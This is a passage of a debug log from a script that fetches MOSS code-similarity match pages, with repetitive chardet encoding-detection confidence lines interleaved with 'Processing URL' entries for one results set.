0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 32463\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5182927570493765\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.505\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5304300423181924\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match34-0.html\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match34-1.html\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5587047055988255\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match43-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match43-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match43-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match40-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match40-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match40-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 25364\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19290\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 25351\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19277\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 25364\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19290\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 25351\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19277\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 25351\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19277\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19278\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 25352\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19277\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 25351\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5267551211286687\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5423715928895604\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match41-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match41-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match41-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match42-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match42-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match42-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match45-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match45-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match45-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 31460\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match47-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match47-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match47-1.html\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 31447\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 21473\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 31460\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 21460\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 31447\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 21473\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 31447\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 21460\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 31448\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 21460\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 31447\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 21461\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 21460\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.52588685464549\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match46-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match46-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match46-1.html\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match44-top.html\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5340010681821794\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match44-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match44-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match48-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match48-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match48-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19619\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 32646\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19290\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19606\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19619\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19277\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 32633\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19606\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19290\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 32646\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19277\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19606\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 32633\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19277\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19607\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19278\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 32633\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19606\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19277\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 32634\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 32633\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.505\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5400886882568331\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.529223397234227\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match51-0.html\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match51-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match51-top.html\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5439906528552106\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5586408682422679\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match50-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match50-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match50-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match54-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match54-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match54-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 17432\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 17419\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 17432\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.9690625\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 17419\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 17419\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 17420\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 17419\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5434487070785733\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 